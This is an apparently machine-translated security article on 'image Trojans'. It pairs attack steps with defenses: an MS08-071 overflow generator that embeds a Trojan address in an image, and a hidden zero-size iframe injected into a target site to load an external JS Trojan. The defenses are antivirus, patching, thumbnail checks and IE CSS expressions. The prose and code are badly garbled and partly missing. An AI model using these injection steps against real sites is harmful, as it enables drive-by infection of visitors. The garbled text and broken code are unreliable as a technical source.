Fighting against webpage Trojans: the "Horse" that lurks in pictures"

In the webpage Trojan history,Picture TrojansIs very "old. Why is the old Trojan technology still widely used? Why is it reckless? How can we prevent it? As a security engineer, you have to know this ......

Ruijia team Li Haibo: many famous forums have seen the use of images and Trojans by hackers. This is a typical overflow attack, which is very dangerous. Hackers use images to mount Trojans. The most typical method is advertising. Once a hacker purchased an advertisement for a portal website to mount Trojans. Because some websites do not store ad images in their own website space, they direct to the address specified by the customer. Therefore, after a hacker buys an advertisement location, modifying the image pointing to the advertisement to a malicious overflow image causes many users to mistakenly think that the portal website is hacked. When performing website security maintenance, some website administrators often think that maintenance is done once. instead of ignoring the upgrade of the anti-virus system, they forget to regularly review the procedures and systems for planned maintenance, as a result, many websites are repeatedly attacked by hackers. Therefore, a qualified security engineer should be patient in reviewing and troubleshooting complex projects without any detail, and always pay attention to the release and update of various security announcements. This is the ultimate strategy for anti-blocking network Trojans.

　　Why are images and Trojans favored?

The reason why hackers are keen on using images and Trojans to catch bots is that the hidden nature of images and Trojans is relatively high. It is time-consuming and laborious for network administrators to find harmful files in thousands of images. In addition, it is difficult to embed seemingly no problematic images into a webpage by embedding them.

More importantly, images are always the best bait for capturing bots. Hackers often only need to mount trojans on their websites and then name them with a name that is either sensational or suggestive. A steady stream of bots will come to the door. So the pictures and Trojans are just like the mermaid who will eat people in ancient legends. First, they will confuse the sailors who sail in the sea with beautiful songs and let them deviate from their course, then, they threw themselves into the mermaid trap.

There are two main ways to mount images and Trojans. One is to directly use the JPG, GDI, or ANI vulnerabilities to bypass Trojans and create overflow files, directly upload or link to the compromised website, and wait for users without patches to recruit.

The other is to put a trojan in disguise. Encrypt the webpage trojan that contains JS Code or IFRAME code and add it to the HTML file.

　　Attack and Defense recording of images and Trojans

　　Method 1: Image vulnerability Trojan

　　Attack
　　This trojan method mainly utilizes system or website creation program vulnerabilities. We take MS08-071 vulnerability as an example to explain this trojan method. First open MS08-071 vulnerability overflow generator and enter the Trojan's address in the address column (figure 1 ).

Select a normal image (preferably a BMP image) in the image address option and click "generate". The image contains malicious code (in WMF Format) it appears in the directory where the overflow program is located (figure 2 ).

Encyclopedia: MS08-071 vulnerability is a remote code execution vulnerability, if the user opens a specially crafted WMF file, image files, etc., will trigger the vulnerability, remote control by hackers. Hackers have the permission to view, modify, delete data, or create a new account.

After a malicious image is generated, save it to the specified website and add the normal image display code to the webpage for Trojan Infection: . Modify the IP address based on the actual situation. After the code is added, all visitors will seek help when browsing the webpage.

　　Defense
　　The best way to prevent this type of image Trojans is to deploy the server's anti-virus system. Generally, the anti-virus system is detecting and killing this vulnerability. The trojan has a high validity rate and speed. If necessary, remind employees of the work unit to promptly upgrade the system patch to prevent internal infections. This malicious image-based overflow and Trojan-mounting method currently has many methods, such as JPG, GIF, ANI, and GDI.

In addition, although the image of the overflow file can be normally displayed, it is still not displayed normally in most cases, especially when you use a thumbnail to view the image file, overflow images containing malicious code are often not displayed normally. Therefore, security engineers can use the thumbnail view function in Windows Resource Manager, check which images on the Website Cannot be normally displayed in the thumbnail mode.

Method 2: fake pictures and Trojans

　　Attack
　　This method is relatively simple, so it is very popular recently. The specific operation method is as follows: first prepare the special JS Trojan code, then open the Wordpad, and enter the HTML code (set the trojan address embedded in the framework to the address of the image Trojan webpage ):

<Html>
<Iframe. src = "http: // specially crafted JS Trojan code. js" height = 0 width = 0> </iframe>
</center>
</Html>

Insert the code to the internal page of the target website or save it as HTML and upload it to the target website. When a user accesses the webpage, the code is marked in figure 3 ).

In fact, this trojan method uses images as a way to divert the sight of webpage visitors. Earlier in the past, we could save similar HTML code as a GIF file and upload or mount it to a dynamic network forum. However, the method of directly saving it as a GIF is no longer valid.

　　Defense
　　This method is similar to the method used to prevent IFRAME Trojans. JS code can be used to block JS file running in external domains.

Iframe {zimo1: expression (this. src = about: blank, this. outerHTML = );}

Script {zimo2: expression (this. src. toLowerCase (). indexOf (http) = 0 )? Document.exe cCommand (stop ):);}

This Code immediately calls the IE private execCommand method to stop all requests on the page, so the JS file in the external domain is forced to stop downloading, just as we clicked the "stop" button in the browser.